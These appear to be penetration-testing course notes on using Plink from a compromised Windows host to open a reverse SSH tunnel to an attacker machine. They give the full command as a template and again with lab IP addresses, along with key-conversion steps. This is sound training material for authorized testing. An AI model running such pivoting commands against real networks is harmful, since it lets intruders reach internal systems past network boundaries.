- Is a Windows command line version of the PuTTY SSH client
- Our use of Plink tends to be a case of transporting the binary to the target, then using it to create a reverse connection.
- This would be done with the following command:
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
- To use our example from before, if we have access to
172.16.0.5and would like to forward a connection to172.16.0.10:80back to port8000our own attacking machine (172.16.0.20), we could use this command:
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 [email protected] -i KEYFILE -N
- Note that any keys generated by ssh-keygen will not work properly here.
- You will need to convert them using the
puttygentool, which can be installed on Kali usingsudo apt install putty-tools. After downloading the tool, conversion can be done with:
puttygen KEYFILE -o OUTPUT_KEY.ppk
- Plink is notorious for going out of date quickly, which often results in failing to connect back. Always make sure you have an up to date version of the .exe. Whilst there is a copy pre-installed on Kali at
/usr/share/windows-resources/binaries/plink.exe - Download the latest
- https://www.chiark.greenend.org.uk/\~sgtatham/putty/latest.html